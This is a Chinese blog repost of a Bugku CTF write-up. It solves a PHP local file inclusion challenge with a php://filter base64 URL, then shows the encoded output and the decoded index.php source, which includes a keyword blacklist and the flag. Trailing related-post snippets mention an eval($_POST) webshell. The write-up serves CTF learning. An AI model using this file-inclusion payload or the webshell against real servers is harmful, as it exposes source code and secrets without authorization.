flag在index里

最新推荐文章于 2022-10-21 22:33:11 发布
最新推荐文章于 2022-10-21 22:33:11 发布
阅读量338 收藏 2
点赞数
文章标签: php 人工智能
原文链接:http://www.cnblogs.com/unixcs/p/10606902.html
版权

题目:http://123.206.87.240:8005/post/

 

我们来看这一题  

首先打开题目

他让点击就点击呗

跳转到另一个新的界面

 

这就没了???

。。。

没思路就对了     //假装证明自己还有进步的空间?

去偷瞟一下别人的WP

稍微有点思路了

 

 

 

 

 

 

 

 

这道题是  本地文件包含漏洞+php伪协议    的结合应用

 

file关键字是提示,说明这题有文件包含漏洞

php的封装协议:http://php.net/manual/zh/wrappers.php.php

 

 

 

 

 

 

http://123.206.87.240:8005/post/index.php?file=php://filter/read=convert.base64-encode/resource=index.php

 

 首先这是一个file关键字的get参数传递

php://     是一种协议名称

php://filter/   是一种访问本地文件的协议

/read=convert.base64-encode/  表示读取的方式是base64编码后

resource=index.php  表示目标文件为index.php

 

 

 

 

 

 

访问结果:

 

PGh0bWw+DQogICAgPHRpdGxlPkJ1Z2t1LWN0ZjwvdGl0bGU+DQogICAgDQo8P3BocA0KCWVycm9yX3JlcG9ydGluZygwKTsNCglpZighJF9HRVRbZmlsZV0pe2VjaG8gJzxhIGhyZWY9Ii4vaW5kZXgucGhwP2ZpbGU9c2hvdy5waHAiPmNsaWNrIG1lPyBubzwvYT4nO30NCgkkZmlsZT0kX0dFVFsnZmlsZSddOw0KCWlmKHN0cnN0cigkZmlsZSwiLi4vIil8fHN0cmlzdHIoJGZpbGUsICJ0cCIpfHxzdHJpc3RyKCRmaWxlLCJpbnB1dCIpfHxzdHJpc3RyKCRmaWxlLCJkYXRhIikpew0KCQllY2hvICJPaCBubyEiOw0KCQlleGl0KCk7DQoJfQ0KCWluY2x1ZGUoJGZpbGUpOyANCi8vZmxhZzpmbGFne2VkdWxjbmlfZWxpZl9sYWNvbF9zaV9zaWh0fQ0KPz4NCjwvaHRtbD4NCg==

 

 

 

 一大串乱码??

试试base64解码

 

 

通过base64位解码得到 FLAG

 

 

1 <html>
2 <title>Bugku-ctf</title>    
3 <?php
4 error_reporting(0);
5  if(!$_GET[file]){echo '<a href="./index.php?file=show.php">click me? no</a>';}
6                      单机跳转到 ./../show.php
7  $file=$_GET['file'];
8   if(strstr($file,"../")||stristr($file, "tp")||
   stristr($file,"input")||stristr($file,"data")){
9    当get传参中出现  ../   tp  input  data   这些关键词的时 
10    echo "Oh no!";
11   输出 ··
12    exit();
13    结束
14    }
15   include($file); 
16 //flag:flag{edulcni_elif_lacol_si_siht}    //flag
17 ?>
18 </html>

 

 

 

 

参考:

谈一谈php://filter的妙用

转载于:https://www.cnblogs.com/unixcs/p/10606902.html

a674212706
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
flag.js:cli标志解析
07-03
[Downloads][downloads-image]][downloads-url] cli标志解析安装$ npm install --save flag.js ##Usage #### .flag(name, fallback, message)默认选项: // Run program: `node index.js -foo=bar -bar=777 -
BUUCTF-web极客大挑战
zhhhb1005的博客
04-17 3649
目录 [极客大挑战 2019]Knife [极客大挑战 2019]Http [极客大挑战 2019]Upload ​ [极客大挑战 2019]PHP [极客大挑战 2019]Knife eval($_POST["Syc"]); 这是一个典型的后门程序,用蚁剑链接复制url,密码则是页面中给的密码Syc。 在根目录下找到flag文件,得出flag。 [极客大挑战 2019]Http 打开页面后查看源代码,发现一个php文件 打开链接node4.buuoj..
[NISACTF 2022]bingdundun
jhk8698的博客
10-19 1691
[NISACTF 2022]bingdundun 刷题记录
获取flag
qq_49091880的博客
01-02 1万+
获取FLAG值 一、SSH服务器 1.如何从外部进入最终root主机,获得flag值 SSH:建立在应用层基础上的协议 SSH是目前较可靠,专门远程登录会话和其他网络服务提供安全性的 协议。利用SSH协议可以有效防止远程管理过程中的信息泄露问题 2.SSH基于TCP 22端口的服务 3.SSH协议认证机制 (1)基于口令的安全验证 (2)基于密钥的安全验证 注:id_rsa:私钥 id_rsa.pub:公钥 二、实验环境 1.攻击机:192.168.1.105 2.靶机机器:192.168.1.106
BUUCTF解题web十一道(02)
qq_45837896的博客
06-01 983
[RoarCTF 2019]Easy Calc 进入页面,发现,诶还真是一个计算器 输几个数进去,还真能计算,不过2^10算的时候遭到了计算器的抵抗 哈哈哈哈步入正轨 看看源码是有个输入过滤,发现这个计算器在向calc.php传参,我们进去看看 这就是calc.php页面,在这我们看到了GET传参,还有一个黑名单,这又是正则匹配绕过呀 ...
config-commitlint:在flagbit上使用Commitlint配置
03-10
在flagbit上使用Commitlint配置 如何在我的项目中使用它? 在项目的根目录中创建一个名为commitlint.config.js的新文件,包括以下内容: module . exports = { extends : [ "@flagbit/config-commitlint" ] , ...
ctf-scoreboard:MITRE的存储库Capture Flag记分牌
02-05
MITER CTF记分牌 ... 用于MITER Capture the Flag竞赛网站。... 要在coverage/index.html生成本地代码覆盖率报告,请设置$LOCAL_COVERAGE环境变量: export LOCAL_COVERAGE=true 生产 按照创建计分板的生产安装。
如何在微信小程序面退出小程序的方法
11-28
如何在小程序面退出小程序。 这个功能基本上都会用到,而文档面没有找到如微信一样直接的api: WeixinJSBridge.call('closeWindow'); 于是我就各种上网搜,好的,结果告诉我小程序已经出了这个api,但未公开= ...
mysql-country-with-flag:带国旗的国家和地区代码列表
05-19
如果要在Web项目中使用它,则将flags目录放置在项目的image目录中。 /|+-- css|+-- image| || +-- flags|+-index.php|+-- js| || +- jquery.js|+-- resource从国家/地区表中获取代码值时,可以执行以下操作来创建...
文件上传相关题目
m0_73952121的博客
10-21 997
简单的文件上传题目
Bugku——flagindex
王嘟嘟的博客
11-03 1055
0x00 前言 今日份CTF奉上,这到底涉及到的伪协议是真的不懂呀。 题目 0x01 start 我一直都相信就算有什么东西不会,但是请把你能做好的每一点都做好,比如说xxxx这个东西你根本不会,你首先要做的就是把xxxx这个名字的意思查清楚,虽然很蠢,但是也是一中态度。 点开链接进行查看 点一下click me进行尝试。 发现这很明显的提示file=xxxx 知道是文件包含,但是怎么利用...
CTF/CTF练习平台-flagindexphp://filter的利用】
Sp4rkW的博客
08-20 4万+
原题内容: http://120.24.86.145:8005/post/ Mark一下这道题,前前后后弄了两个多小时,翻了一下别的博主的wp感觉还是讲的太粗了,这总结下自己的理解: 首先打开这道题,页面只给你click me? no 点击进去显示test5 第一步,查看源代码,无果 第二步bp,无果 结合到题目,flagindex,大胆尝试http://12...
Bugku-web进阶之phpcmsV9(一个靶机而已,别搞破坏。flag在根目录txt文件
weixin_30593443的博客
08-21 1926
phpcmsV9 一个靶机而已,别搞破坏。 flag在根目录txt文件 http://123.206.87.240:8001/ 本题要点:目录扫描 打开网页 根据提示:一个靶机而已,别搞破坏。flag在根目录txt文件 我们先用御剑扫描一下后台 ,看看有没有什么可用的信息 我们访问一下 htt...
bugkuctf——flag就在index
weixin_40980428的博客
03-30 1945
打开链接后看到一串英文字符“点我?不”,点开看看发现了file参数原来是文件包含漏洞,通过php://filter读取index源码--&gt;php://filter/read=convert.base64-encode/resource=index.phpburp,然后将其进行base64解密得到flag...
BugkuCTF–flagindex
热门推荐
超人学飞的日子
06-05 4万+
题目地址http://120.24.86.145:8005/post/这道题目有经典的本地文件包含漏洞+php伪协议的结合应用点击后注意到url地址  http://120.24.86.145:8005/post/index.php?file=show.php这是一个典型的文件包含漏洞,(file关键字是提示,其实也是CTF的套路)。这用到了php的封装协议:http://php.net/ma...
Flag.soft_index = 0;
最新发布
03-31
As an AI language model, I do not have enough context to determine what programming language or environment this code is intended for. However, based on the syntax, it appears to be setting the value of a variable named "soft_index" to 0 in some program or script.

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值